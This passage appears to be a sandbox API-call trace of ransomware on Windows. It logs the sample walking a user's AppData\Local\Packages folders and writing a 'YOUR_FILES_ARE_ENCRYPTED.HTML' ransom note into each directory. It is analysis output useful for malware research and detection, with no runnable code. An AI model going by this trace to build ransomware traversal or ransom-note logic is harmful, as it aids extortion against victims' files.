lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.100] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.101] CloseHandle (hObject=0x324) returned 1 [0118.101] GetProcessHeap () returned 0x600000 [0118.101] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.101] GetProcessHeap () returned 0x600000 [0118.101] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.101] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8282d8b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8282d8b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8282d8b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0118.101] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.102] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\SystemAppData") returned 95 [0118.102] GetProcessHeap () returned 0x600000 [0118.102] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.102] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\SystemAppData" [0118.102] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\SystemAppData\\*" [0118.102] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8282d8b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8282d8b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8282d8b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0118.102] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8282d8b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8282d8b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8282d8b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0118.102] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8282d8b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8282d8b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8282d8b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0118.102] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0118.102] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0118.102] GetProcessHeap () returned 0x600000 [0118.102] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.skypeapp_kzf8qxf38zg5c\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.104] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.105] CloseHandle (hObject=0x324) returned 1 [0118.105] GetProcessHeap () returned 0x600000 [0118.105] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.105] GetProcessHeap () returned 0x600000 [0118.106] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.106] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf825cc02, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf825cc02, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0118.106] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.106] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\TempState") returned 91 [0118.106] GetProcessHeap () returned 0x600000 [0118.106] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.106] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\TempState" [0118.106] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\TempState\\*" [0118.106] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf825cc02, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf825cc02, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0118.109] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf825cc02, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf825cc02, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0118.110] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf825cc02, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf825cc02, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0118.110] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0118.110] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0118.110] GetProcessHeap () returned 0x600000 [0118.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.skypeapp_kzf8qxf38zg5c\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.111] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.112] CloseHandle (hObject=0x324) returned 1 [0118.112] GetProcessHeap () returned 0x600000 [0118.112] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.112] GetProcessHeap () returned 0x600000 [0118.112] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.112] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf825cc02, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf825cc02, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0118.112] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0118.112] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0118.112] GetProcessHeap () returned 0x600000 [0118.112] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.skypeapp_kzf8qxf38zg5c\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0118.114] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0118.115] CloseHandle (hObject=0x31c) returned 1 [0118.115] GetProcessHeap () returned 0x600000 [0118.115] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.115] GetProcessHeap () returned 0x600000 [0118.115] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x698498 | out: hHeap=0x600000) returned 1 [0118.117] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc9dcff, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc9dcff, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.VCLibs.140.00_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.00_")) returned 1 [0118.117] StrStrIW (lpFirst="Microsoft.VCLibs.140.00_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.117] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe") returned 86 [0118.117] GetProcessHeap () returned 0x600000 [0118.117] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x698498 [0118.118] lstrcpyW (in: lpString1=0x698498, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe" [0118.118] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\*" [0118.118] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc9dcff, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc9dcff, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0118.119] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbc51817, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc9dcff, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc9dcff, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0118.119] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdbc9dcff, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbcc3f61, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbcc3f61, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0118.119] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.119] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC") returned 89 [0118.119] GetProcessHeap () returned 0x600000 [0118.119] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.120] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC" [0118.120] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\*" [0118.120] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdbc9dcff, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbcc3f61, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbcc3f61, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0118.134] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdbc9dcff, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbcc3f61, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbcc3f61, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="..", cAlternateFileName="")) returned 1 [0118.134] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdbc9dcff, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc9dcff, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc9dcff, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d6e6, dwReserved1=0x315d638, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0118.134] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.134] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetCache") returned 99 [0118.134] GetProcessHeap () returned 0x600000 [0118.134] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.135] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetCache" [0118.135] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetCache\\*" [0118.135] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdbc9dcff, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc9dcff, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc9dcff, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x315d640, cFileName=".", cAlternateFileName="")) returned 0x626838 [0118.136] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdbc9dcff, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc9dcff, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc9dcff, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x315d640, cFileName="..", cAlternateFileName="")) returned 1 [0118.136] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdbc9dcff, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbc9dcff, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbc9dcff, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7b8, dwReserved1=0x315d640, cFileName="..", cAlternateFileName="")) returned 0 [0118.136] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0118.136] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0118.136] GetProcessHeap () returned 0x600000 [0118.136] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.vclibs.140.00_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0118.140] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.141] CloseHandle (hObject=0x320) returned 1 [0118.141] GetProcessHeap () returned 0x600000 [0118.142] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.142] GetProcessHeap () returned 0x600000 [0118.142] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.142] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xdbcc3f61, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbcc3f61, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdbcc3f61, ftLastWriteTime.dwHighDateTime=0x1d70070, 